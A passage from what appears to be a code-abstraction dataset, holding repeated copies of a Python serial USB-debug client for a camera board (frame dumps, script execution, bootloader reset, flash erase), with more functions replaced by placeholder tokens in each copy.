__serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
